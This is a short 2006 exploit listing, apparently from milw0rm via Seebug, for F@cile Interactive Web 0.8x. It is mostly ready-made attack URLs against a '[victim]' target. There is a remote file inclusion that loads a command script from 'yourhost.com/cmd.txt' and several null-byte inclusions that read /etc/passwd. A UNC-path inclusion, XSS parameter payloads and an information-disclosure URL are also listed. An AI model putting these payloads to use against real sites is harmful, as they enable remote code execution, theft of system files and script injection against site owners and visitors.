F@cile Interactive Web <= 0.8x Multiple Remote Vulnerabilities Contacts > ICQ: 10072 MSN/Mail: nukedx@nukedx.com web: www.nukedx.com This exploits works on F@cile Interactive Web <= 0.8x Original advisory can be found at: http://www.nukedx.com/?viewdoc=35 File Inclusion Vulnerabilities. http://[victim]/[FacilePath]/p-popupgallery.php?l=http://yourhost.com/cmd.txt? http://[victim]/[FacilePath]/p-popupgallery.php?l=/etc/passwd%00 http://[victim]/[FacilePath]/p-editbox.php?pathfile=/etc/passwd http://[victim]/[FacilePath]/p-editbox.php?pathfile=\\192.168.1.1\file.php <- php5 http://[victim]/[FacilePath]/p-editpage.php?pathfile=/etc/passwd http://[victim]/[FacilePath]/p-editpage.php?pathfile=\\192.168.1.1\file.php <- php5 http://[victim]/[FacilePath]/p-themes/lowgraphic/index.inc.php?mytheme=/etc/passwd%00 http://[victim]/[FacilePath]/p-themes/classic/index.inc.php?mytheme=/etc/passwd%00 http://[victim]/[FacilePath]/p-themes/puzzle/index.inc.php?mytheme=/etc/passwd%00 http://[victim]/[FacilePath]/p-themes/simple/index.inc.php?mytheme=/etc/passwd%00 http://[victim]/[FacilePath]/p-themes/ciao/index.inc.php?mytheme=/etc/passwd%00 Cross Site Scripting. http://[victim]/[FacilePath]/p-themes/lowgraphic/index.inc.php?mytheme=XSS&myskin=XSS http://[victim]/[FacilePath]/p-themes/classic/index.inc.php?mytheme=XSS&myskin=XSS http://[victim]/[FacilePath]/p-themes/puzzle/index.inc.php?mytheme=XSS&myskin=XSS http://[victim]/[FacilePath]/p-themes/simple/index.inc.php?mytheme=XSS&myskin=XSS http://[victim]/[FacilePath]/p-themes/ciao/index.inc.php?mytheme=XSS&myskin=XSS Information disclosure http://[victim]/[FacilePath]/index.php?mn=0&pg=0&lang=/etc/passwd%00 # nukedx.com [2006-05-27] # milw0rm.com [2006-05-28]
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论